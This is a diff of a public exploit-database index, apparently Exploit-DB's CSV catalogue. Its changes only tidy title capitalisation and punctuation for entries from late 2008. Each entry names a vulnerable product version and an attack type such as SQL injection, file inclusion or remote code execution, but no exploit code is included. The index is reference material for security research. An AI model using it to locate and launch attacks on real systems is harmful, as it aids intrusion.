6980,platforms/php/webapps/6980.txt,"Joomla Component ProDesk 1.0/1.2 - Local File Inclusion Vulnerability",2008-11-04,d3v1l,php,webapps,0 -6981,platforms/php/webapps/6981.txt,"Vibro-School-CMS (nID) Remote SQL injection Vulnerability",2008-11-04,Cyber-Zone,php,webapps,0 -6982,platforms/php/webapps/6982.txt,"CMS-School 2005 (showarticle.php) Remote SQL injection Vulnerability",2008-11-04,Cyber-Zone,php,webapps,0 +6981,platforms/php/webapps/6981.txt,"Vibro-School-CMS (nID) Remote SQL Injection Vulnerability",2008-11-04,Cyber-Zone,php,webapps,0 +6982,platforms/php/webapps/6982.txt,"CMS-School 2005 (showarticle.php) Remote SQL Injection Vulnerability",2008-11-04,Cyber-Zone,php,webapps,0 6983,platforms/php/webapps/6983.txt,"WEBBDOMAIN Petition 1.02/2.0/3.0 (SQL Injection) Auth Bypass Vuln",2008-11-04,Hakxer,php,webapps,0 6984,platforms/php/webapps/6984.txt,"WEBBDOMAIN Polls 1.01 (SQL Injection) Auth Bypass Vulnerability",2008-11-04,Hakxer,php,webapps,0 6985,platforms/php/webapps/6985.txt,"WEBBDOMAIN Quiz <= 1.02 (Auth Bypass) SQL Injection Vulnerability",2008-11-04,Hakxer,php,webapps,0 @@ -6674,7 +6674,7 @@ id,file,description,date,author,platform,type,port 7116,platforms/php/webapps/7116.txt,"AlstraSoft Web Host Directory 1.2 - Multiple Vulnerabilities",2008-11-14,G4N0K,php,webapps,0 7117,platforms/php/webapps/7117.txt,"GS Real Estate Portal US/International Module Multiple Vulnerabilities",2008-11-14,ZoRLu,php,webapps,0 7118,platforms/php/webapps/7118.txt,"turnkeyforms Text Link Sales Auth Bypass Vulnerability",2008-11-14,G4N0K,php,webapps,0 -7119,platforms/php/webapps/7119.php,"Discuz! 6.x/7.x Remote Code Execution Exploit",2008-11-14,80vul,php,webapps,0 +7119,platforms/php/webapps/7119.php,"Discuz! 6.x/7.x - Remote Code Execution Exploit",2008-11-14,80vul,php,webapps,0 7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 (Auth Bypass) SQL Injection Vulnerability",2008-11-14,R3d-D3V!L,asp,webapps,0 7121,platforms/php/webapps/7121.pl,"SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit",2008-11-14,StAkeR,php,webapps,0 7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal Multiple SQL Injection Vulnerability",2008-11-14,InjEctOr5,php,webapps,0 @@ -6703,7 +6703,7 @@ id,file,description,date,author,platform,type,port 7147,platforms/php/webapps/7147.txt,"SaturnCMS (view) Blind SQL Injection Vulnerability",2008-11-17,"Hussin X",php,webapps,0 7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 (index.php serverid) SQL Injection Vulnerability",2008-11-17,eek,php,webapps,0 7149,platforms/php/webapps/7149.php,"VideoScript <= 4.0.1.50 Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 -7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 CSRF (add rss subscription) Remote Crash Exploit",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0 +7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - CSRF (add rss subscription) Remote Crash Exploit",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0 7151,platforms/linux/remote/7151.c,"No-IP DUC <= 2.1.7 - Remote Code Execution Exploit",2008-11-18,XenoMuta,linux,remote,0 7152,platforms/php/webapps/7152.txt,"Musicbox 2.3.8 (viewalbums.php artistId) SQL Injection Vulnerability",2008-11-18,snakespc,php,webapps,0 7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 (g_pcltar_lib_dir) Local File Inclusion Vulnerability",2008-11-18,DSecRG,php,webapps,0 @@ -6733,7 +6733,7 @@ id,file,description,date,author,platform,type,port 7180,platforms/php/webapps/7180.txt,"VCalendar (VCalendar.mdb) Remote Database Disclosure Vulnerability",2008-11-20,Swan,php,webapps,0 7181,platforms/windows/remote/7181.html,"KVIrc 3.4.2 Shiny (uri handler) Remote Command Execution Exploit",2008-11-21,Nine:Situations:Group,windows,remote,0 7182,platforms/php/webapps/7182.txt,"Joomla Component Thyme 1.0 (event) SQL Injection Vulnerability",2008-11-21,"Ded MustD!e",php,webapps,0 -7183,platforms/linux/remote/7183.txt,"verlihub <= 0.9.8d-RC2 Remote Command Execution Vulnerability",2008-11-21,v4lkyrius,linux,remote,0 +7183,platforms/linux/remote/7183.txt,"verlihub <= 0.9.8d-RC2 - Remote Command Execution Vulnerability",2008-11-21,v4lkyrius,linux,remote,0 7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 (product) SQL Injection Vulnerability",2008-11-22,NoGe,php,webapps,0 7185,platforms/php/webapps/7185.php,"Discuz! Remote Reset User Password Exploit",2008-11-22,80vul,php,webapps,0 7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 (blog.php user) Remote SQL Injection Vulnerability",2008-11-22,Mr.SQL,php,webapps,0 @@ -6743,19 +6743,19 @@ id,file,description,date,author,platform,type,port 7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit",2008-11-22,cOndemned,php,webapps,0 7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index (id) Remote SQL Injection Vulnerability",2008-11-23,snakespc,php,webapps,0 7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0 -7197,platforms/php/webapps/7197.txt,"Goople Cms 1.7 - Remote File Upload Vulnerability",2008-11-23,x0r,php,webapps,0 +7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Remote File Upload Vulnerability",2008-11-23,x0r,php,webapps,0 7198,platforms/php/webapps/7198.txt,"NetArtMedia Cars Portal 2.0 (image.php id) SQL Injection Vulnerability",2008-11-23,snakespc,php,webapps,0 7199,platforms/php/webapps/7199.txt,"NetArtMedia Blog System (image.php id) SQL Injection Vulnerability",2008-11-23,snakespc,php,webapps,0 7200,platforms/php/webapps/7200.txt,"PG Real Estate (Auth Bypass) SQL Injection Vulnerability",2008-11-23,ZoRLu,php,webapps,0 7201,platforms/php/webapps/7201.txt,"PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability",2008-11-23,ZoRLu,php,webapps,0 7202,platforms/php/webapps/7202.txt,"PG Job Site (poll_view_id) Blind SQL Injection Vulnerability",2008-11-23,ZoRLu,php,webapps,0 7204,platforms/php/webapps/7204.txt,"modx cms <= 0.9.6.2 (rfi/xss) Multiple Vulnerabilities",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 -7205,platforms/php/webapps/7205.txt,"Goople Cms 1.7 Insecure Cookie Handling Vulnerability",2008-11-23,BeyazKurt,php,webapps,0 +7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 Insecure Cookie Handling Vulnerability",2008-11-23,BeyazKurt,php,webapps,0 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script Remote Database Disclosure Vulnerability",2008-11-23,InjEctOr5,php,webapps,0 7207,platforms/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC",2008-11-24,LiquidWorm,windows,dos,0 7208,platforms/php/webapps/7208.txt,"NetArtMedia Real Estate Portal 1.2 (ad_id) SQL Injection Vuln",2008-11-24,"Hussin X",php,webapps,0 7209,platforms/windows/dos/7209.pl,"W3C Amaya 10.1 Web Browser (URL Bar) Remote Stack Overflow PoC",2008-11-24,r0ut3r,windows,dos,0 -7210,platforms/php/webapps/7210.txt,"Goople Cms 1.7 Arbitrary Code Execution Vulnerability",2008-11-24,x0r,php,webapps,0 +7210,platforms/php/webapps/7210.txt,"Goople CMS 1.7 Arbitrary Code Execution Vulnerability",2008-11-24,x0r,php,webapps,0 7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection Exploit",2008-11-24,G4N0K,php,webapps,0 7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection Exploit",2008-11-24,G4N0K,php,webapps,0 7213,platforms/windows/dos/7213.pl,"W3C Amaya 10.1 Web Browser (id) Remote Stack Overflow PoC",2008-11-24,r0ut3r,windows,dos,0 @@ -6780,20 +6780,20 @@ id,file,description,date,author,platform,type,port 7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability",2008-11-25,EL_MuHaMMeD,php,webapps,0 7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) File Upload Exploit",2008-11-25,cOndemned,php,webapps,0 7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ (view_snaps.php type) Blind SQL Injection Vulnerability",2008-11-25,Cyber-Zone,php,webapps,0 -7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x (show_emp) Blind SQL Injection Vulnerability",2008-11-25,XaDoS,php,webapps,0 +7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection Vulnerability",2008-11-25,XaDoS,php,webapps,0 7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Remote Blind SQL Injection Vulnerability (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0 -7237,platforms/php/webapps/7237.txt,"CMS Ortus <= 1.13 Remote SQL Injection Vulnerability",2008-11-26,otmorozok428,php,webapps,0 +7237,platforms/php/webapps/7237.txt,"CMS Ortus <= 1.13 - Remote SQL Injection Vulnerability",2008-11-26,otmorozok428,php,webapps,0 7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection Vulnerability",2008-11-26,XaDoS,php,webapps,0 7239,platforms/php/webapps/7239.txt,"ParsBlogger (blog.asp wr) - Remote SQL Injection Vulnerability",2008-11-26,"BorN To K!LL",php,webapps,0 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Remote Blind SQL Injection Vulnerability",2008-11-26,b3hz4d,php,webapps,0 7241,platforms/php/webapps/7241.txt,"TxtBlog (index.php m) 1.0 Alpha - Local File Inclusion Vulnerability",2008-11-27,"CWH Underground",php,webapps,0 -7242,platforms/php/webapps/7242.txt,"web calendar system 3.12/3.30 Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 -7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Remote Blind SQL Injection exploit",2008-11-27,Stack,php,webapps,0 +7242,platforms/php/webapps/7242.txt,"web calendar system 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 +7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Remote Blind SQL Injection Exploit",2008-11-27,Stack,php,webapps,0 7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities",2008-11-27,Pouya_Server,php,webapps,0 7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro Database Disclosure Vulnerability",2008-11-27,Pouya_Server,php,webapps,0 7246,platforms/php/webapps/7246.txt,"Ocean12 Poll Manager Pro Database Disclosure Vulnerability",2008-11-27,Pouya_Server,php,webapps,0 7247,platforms/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold Database Disclosure Vulnerability",2008-11-27,Pouya_Server,php,webapps,0 -7248,platforms/php/webapps/7248.txt,"Family Project 2.x (Auth Bypass) SQL Injection Vulnerability",2008-11-27,The_5p3ctrum,php,webapps,0 +7248,platforms/php/webapps/7248.txt,"Family Project 2.x - (Auth Bypass) SQL Injection Vulnerability",2008-11-27,The_5p3ctrum,php,webapps,0 7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client <= 2.00b (wscanf) Remote Format String PoC",2008-11-27,"Alfons Luja",windows,dos,0 7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart (subcategory_id) SQL Injection Vulnerability",2008-11-27,XaDoS,php,webapps,0 7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Remote File Upload Vulnerability",2008-11-27,ZoRLu,php,webapps,0 @@ -6871,7 +6871,7 @@ id,file,description,date,author,platform,type,port 7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 (pics_pre.asp ID) Blind SQL Injection Vulnerability",2008-12-03,R3d-D3V!L,asp,webapps,0 7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection Vulnerability",2008-12-03,R3d-D3V!L,asp,webapps,0 7328,platforms/php/webapps/7328.pl,"Check New 4.52 (findoffice.php search) Remote SQL Injection Exploit",2008-12-03,"CWH Underground",php,webapps,0 -7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit",2008-12-03,"Encrypt3d.M!nd ",windows,local,0 +7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 (rdp file) Buffer Overflow Exploit",2008-12-03,"Encrypt3d.M!nd ",windows,local,0 7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 (JPEG Parsing) Recursive Stack Overflow PoC",2008-12-03,"ilja van sprundel",multiple,dos,0 7331,platforms/php/webapps/7331.pl,"Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit",2008-12-03,StAkeR,php,webapps,0 7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET Remote Database Disclosure Vulnerability",2008-12-03,AlpHaNiX,php,webapps,0 @@ -6944,14 +6944,14 @@ id,file,description,date,author,platform,type,port 7400,platforms/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 (LFI/XSS) Multiple Vulnerabilities",2008-12-09,ahmadbady,php,webapps,0 7401,platforms/windows/dos/7401.txt,"Vinagre < 2.24.2 show_error() Remote Format String PoC",2008-12-09,"Core Security",windows,dos,0 7402,platforms/windows/remote/7402.html,"EasyMail ActiveX (emmailstore.dll 6.5.0.3) Buffer Overflow Exploit",2008-12-09,e.wiZz!,windows,remote,0 -7403,platforms/windows/remote/7403.txt,"MS Internet Explorer XML Parsing Remote Buffer Overflow Exploit 0day",2008-12-10,"Guido Landi",windows,remote,0 +7403,platforms/windows/remote/7403.txt,"Microsoft Internet Explorer - XML Parsing Remote Buffer Overflow Exploit (0day)",2008-12-10,"Guido Landi",windows,remote,0 7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 (htmpl_admin.cgi help) Command Execution Vulnerability",2008-12-10,ZeN,cgi,webapps,0 7405,platforms/linux/dos/7405.c,"Linux Kernel <= 2.6.27.8 - ATMSVC Local Denial of Service Exploit",2008-12-10,"Jon Oberheide",linux,dos,0 7406,platforms/php/webapps/7406.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 Privilege Escalation Exploit",2008-12-10,s4avrd0w,php,webapps,0 7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace (member.php u) SQL Injection Vulnerability",2008-12-10,"Hussin X",php,webapps,0 7408,platforms/php/webapps/7408.txt,"living local 1.1 (xss-rfu) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 (XSS/CSRF) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0 -7410,platforms/windows/remote/7410.htm,"MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day",2008-12-10,muts,windows,remote,0 +7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (vista) (0day)",2008-12-10,muts,windows,remote,0 7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 (view.php id) SQL Injection Vulnerability",2008-12-10,Osirys,php,webapps,0 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 (sql/dd) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0 7413,platforms/asp/webapps/7413.pl,"CF_Calendar (calendarevent.cfm) Remote SQL Injection Exploit",2008-12-10,AlpHaNiX,asp,webapps,0 @@ -6963,7 +6963,7 @@ id,file,description,date,author,platform,type,port 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar Database Disclosure Vulnerability",2008-12-11,Cyber-Zone,asp,webapps,0 7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar (mycal.mdb) Database Disclosure Vuln",2008-12-11,CoBRa_21,asp,webapps,0 7421,platforms/php/webapps/7421.txt,"eZ Publish 3.9.0/3.9.5/3.10.1 Command Execution Exploit (admin req)",2008-12-11,s4avrd0w,php,webapps,0 -7422,platforms/php/webapps/7422.txt,"Feed Cms 1.07.03.19b (lang) Local File Inclusion Vulnerability",2008-12-11,x0r,php,webapps,0 +7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b (lang) Local File Inclusion Vulnerability",2008-12-11,x0r,php,webapps,0 7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 (Auth Bypass) SQL Injection Vulnerability",2008-12-11,R3d-D3V!L,asp,webapps,0 7424,platforms/asp/webapps/7424.txt,"Ad Management Java (Auth Bypass) SQL Injection Vulnerability",2008-12-11,R3d-D3V!L,asp,webapps,0 7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java (Auth Bypass) SQL Injection Vulnerability",2008-12-11,R3d-D3V!L,asp,webapps,0 @@ -6972,7 +6972,7 @@ id,file,description,date,author,platform,type,port 7428,platforms/asp/webapps/7428.txt,"The Net Guys ASPired2Protect Database Disclosure Vulnerability",2008-12-12,AlpHaNiX,asp,webapps,0 7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 (index.asp cha) SQL Injection Vulnerability",2008-12-12,IRCRASH,asp,webapps,0 7430,platforms/php/webapps/7430.txt,"SUMON <= 0.7.0 (chg.php host) Command Execution Vulnerability",2008-12-12,dun,php,webapps,0 -7431,platforms/windows/dos/7431.pl,"MS Visual Basic ActiveX Controls mscomct2.ocx Buffer Overflow PoC",2008-12-12,"Jerome Athias",windows,dos,0 +7431,platforms/windows/dos/7431.pl,"Microsoft Visual Basic ActiveX Controls mscomct2.ocx Buffer Overflow PoC",2008-12-12,"Jerome Athias",windows,dos,0 7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability",2008-12-12,XaDoS,php,webapps,0 7433,platforms/php/webapps/7433.txt,"Social Groupie (group_index.php id) Remote SQL Injection Vulnerability",2008-12-12,InjEctOr5,php,webapps,0 7434,platforms/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve Exploit",2008-12-12,StAkeR,php,webapps,0 @@ -6989,14 +6989,14 @@ id,file,description,date,author,platform,type,port 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0 7446,platforms/asp/webapps/7446.txt,"ASPired2Quote (quote.mdb) Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0 7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System (Auth Bypass) SQL Injection Vuln",2008-12-14,Pouya_Server,asp,webapps,0 -7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 (lfi/csrf/edit file) Multiple Vulnerabilities",2008-12-14,SirGod,php,webapps,0 +7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 (lfi/CSRF/edit file) Multiple Vulnerabilities",2008-12-14,SirGod,php,webapps,0 7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 (iyziforum.mdb) Database Disclosure Vulnerability",2008-12-14,"Ghost Hacker",php,webapps,0 7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum (CAForum.mdb) Database Disclosure Vulnerability",2008-12-14,"Ghost Hacker",asp,webapps,0 7451,platforms/php/webapps/7451.txt,"php weather 2.2.2 (lfi/xss) Multiple Vulnerabilities",2008-12-14,ahmadbady,php,webapps,0 7452,platforms/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN <= 0.4.2 Univ. Remote BOF Exploit",2008-12-14,SkD,windows,remote,69 7453,platforms/php/webapps/7453.txt,"FLDS 1.2a (redir.php id) Remote SQL Injection Vulnerability",2008-12-14,nuclear,php,webapps,0 7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local DoS Exploit",2008-12-14,Adurit-T,linux,dos,0 -7455,platforms/php/webapps/7455.txt,"The Rat Cms Alpha 2 (download.php) Remote Vulnerability",2008-12-14,x0r,php,webapps,0 +7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 (download.php) Remote Vulnerability",2008-12-14,x0r,php,webapps,0 7456,platforms/php/webapps/7456.txt,"Availscript Article Script Remote File Upload Vulnerability",2008-12-14,S.W.A.T.,php,webapps,0 7457,platforms/php/webapps/7457.txt,"Availscript Classmate Script Remote File Upload Vulnerability",2008-12-14,S.W.A.T.,php,webapps,0 7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 (index.php lang) Local File Inclusion Vulnerability",2008-12-14,Osirys,php,webapps,0 @@ -7018,8 +7018,8 @@ id,file,description,date,author,platform,type,port 7474,platforms/php/webapps/7474.txt,"FLDS 1.2a (lpro.php id) Remote SQL Injection Vulnerability",2008-12-15,nuclear,php,webapps,0 7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 (username) CSRF/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 7476,platforms/php/webapps/7476.txt,"Mediatheka <= 4.2 - Remote Blind SQL Injection Exploit",2008-12-15,StAkeR,php,webapps,0 -7477,platforms/windows/remote/7477.html,"MS Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)",2008-12-15,krafty,windows,remote,0 -7478,platforms/php/webapps/7478.txt,"The Rat Cms Alpha 2 (Auth Bypass) SQL Injection Vulnerability",2008-12-15,x0r,php,webapps,0 +7477,platforms/windows/remote/7477.html,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)",2008-12-15,krafty,windows,remote,0 +7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 (Auth Bypass) SQL Injection Vulnerability",2008-12-15,x0r,php,webapps,0 7479,platforms/php/webapps/7479.txt,"XOOPS Module Amevents (print.php id) SQL Injection Vulnerability",2008-12-15,nétRoot,php,webapps,0 7480,platforms/php/webapps/7480.txt,"CadeNix (cid) Remote SQL Injection Vulnerability",2008-12-15,HaCkeR_EgY,php,webapps,0 7481,platforms/php/webapps/7481.txt,"WorkSimple 1.2.1 RFI / Sensitive Data Disclosure Vulnerabilities",2008-12-15,Osirys,php,webapps,0 @@ -7038,13 +7038,13 @@ id,file,description,date,author,platform,type,port 7494,platforms/php/webapps/7494.txt,"Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities",2008-12-16,ZoRLu,php,webapps,0 7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET (authors.asp authorID) SQL Injection Vulnerability",2008-12-16,AlpHaNiX,asp,webapps,0 7496,platforms/hardware/remote/7496.txt,"Barracuda Spam Firewall 3.5.11.020, Model 600 - SQL Injection Vuln",2008-12-16,"Marian Ventuneac",hardware,remote,0 -7497,platforms/php/webapps/7497.txt,"RSMScript 1.21 XSS/Insecure Cookie Handling Vulnerabilities",2008-12-17,Osirys,php,webapps,0 +7497,platforms/php/webapps/7497.txt,"RSMScript 1.21 - XSS/Insecure Cookie Handling Vulnerabilities",2008-12-17,Osirys,php,webapps,0 7499,platforms/asp/webapps/7499.txt,"BP Blog 6.0/7.0/8.0/9.0 - Remote Database Disclosure Vulnerability",2008-12-17,Dxil,asp,webapps,0 7500,platforms/php/webapps/7500.txt,"K&S Shopsysteme Arbitrary Remote File Upload Vulnerability",2008-12-17,mNt,php,webapps,0 7501,platforms/windows/local/7501.asp,"Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit",2008-12-17,"Guido Landi",windows,local,0 7502,platforms/php/webapps/7502.txt,"r.cms 2.0 - Multiple SQL Injection Vulnerabilities",2008-12-17,Lidloses_Auge,php,webapps,0 7503,platforms/multiple/local/7503.txt,"PHP python extension safe_mode Bypass Local Vulnerability",2008-12-17,"Amir Salmani",multiple,local,0 -7504,platforms/php/webapps/7504.txt,"Joomla Component Tech Article 1.x (item) SQL Injection Vulnerability",2008-12-17,InjEctOr5,php,webapps,0 +7504,platforms/php/webapps/7504.txt,"Joomla Component Tech Article 1.x - (item) SQL Injection Vulnerability",2008-12-17,InjEctOr5,php,webapps,0 7505,platforms/windows/remote/7505.html,"Phoenician Casino FlashAX ActiveX Remote Code Execution Exploit",2008-12-17,e.wiZz!,windows,remote,0 7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) Remote SQL Injection Vulnerability",2008-12-17,AnGeL25dZ,php,webapps,0 7507,platforms/php/webapps/7507.pl,"Lizardware CMS <= 0.6.0 - Blind SQL Injection Exploit",2008-12-17,StAkeR,php,webapps,0 @@ -7055,18 +7055,18 @@ id,file,description,date,author,platform,type,port 7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 - Stable Remote Command Execution Exploit",2008-12-18,StAkeR,php,webapps,0 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 Insecure Cookie Handling Vulnerability",2008-12-18,Osirys,php,webapps,0 7514,platforms/php/webapps/7514.txt,"I-Rater Basic (messages.php) Remote SQL Injection Vulnerability",2008-12-18,boom3rang,php,webapps,0 -7515,platforms/php/webapps/7515.txt,"phpclanwebsite <= 1.23.3 fix pack #5 Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 +7515,platforms/php/webapps/7515.txt,"phpclanwebsite <= 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 7516,platforms/windows/local/7516.txt,"ESET Smart Security <= 3.0.672 (epfw.sys) Privilege Escalation Exploit",2008-12-18,"NT Internals",windows,local,0 7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 (id) Remote SQL Injection Vulnerability",2008-12-18,fuzion,php,webapps,0 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 Insecure Cookie Handling Vulnerability",2008-12-18,x0r,php,webapps,0 7519,platforms/php/webapps/7519.txt,"MyPHPsite (index.php mod) Local File Inclusion Vulnerability",2008-12-18,Piker,php,webapps,0 7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 (mDNS Daemon) Remote Denial of Service Exploit",2008-12-19,"Jon Oberheide",multiple,dos,0 -7521,platforms/windows/remote/7521.txt,"webcamXP 5.3.2.375 Remote File Disclosure Vulnerability",2008-12-19,nicx0,windows,remote,0 +7521,platforms/windows/remote/7521.txt,"webcamXP 5.3.2.375 - Remote File Disclosure Vulnerability",2008-12-19,nicx0,windows,remote,0 7522,platforms/php/webapps/7522.pl,"MyPBS (index.php seasonID) Remote SQL Injection Exploit",2008-12-19,Piker,php,webapps,0 7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone Admin Password Changing Exploit",2008-12-19,G4N0K,php,webapps,0 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool (download.php) File Disclosure Vuln",2008-12-19,"Cold Zero",php,webapps,0 7525,platforms/php/webapps/7525.txt,"Extract Website (download.php filename) File Disclosure Vulnerability",2008-12-19,"Cold Zero",php,webapps,0 -7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 XSS/Database Disclosure Vulns",2008-12-19,Osirys,php,webapps,0 +7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - XSS/Database Disclosure Vulns",2008-12-19,Osirys,php,webapps,0 7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 (source.php p) Remote File Disclosure Vulnerability",2008-12-19,Piker,php,webapps,0 7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Remote Shell Upload Exploit",2008-12-19,Ams,php,webapps,0 7529,platforms/php/webapps/7529.txt,"constructr cms <= 3.02.5 stable Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0 @@ -7085,7 +7085,7 @@ id,file,description,date,author,platform,type,port 7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script (filename) File Disclosure Vulnerability",2008-12-22,SirGod,php,webapps,0 7543,platforms/php/webapps/7543.txt,"Wordpress Plugin Page Flip Image Gallery <= 0.2.2 - Remote FD Vuln",2008-12-22,GoLd_M,php,webapps,0 7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit",2008-12-22,Ams,php,webapps,0 -7545,platforms/php/webapps/7545.txt,"yourplace <= 1.0.2 - Multiple Vulnerabilities + rce exploit",2008-12-22,Osirys,php,webapps,0 +7545,platforms/php/webapps/7545.txt,"yourplace <= 1.0.2 - Multiple Vulnerabilities + rce Exploit",2008-12-22,Osirys,php,webapps,0 7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 (job_id) SQL Injection Vulnerability",2008-12-22,boom3rang,php,webapps,0 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit (py)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0 7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0 @@ -7097,10 +7097,10 @@ id,file,description,date,author,platform,type,port 7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit",2008-12-23,"Jeremy Brown",windows,dos,0 7555,platforms/multiple/dos/7555.py,"Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin)",2008-12-23,Sha0,multiple,dos,0 7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 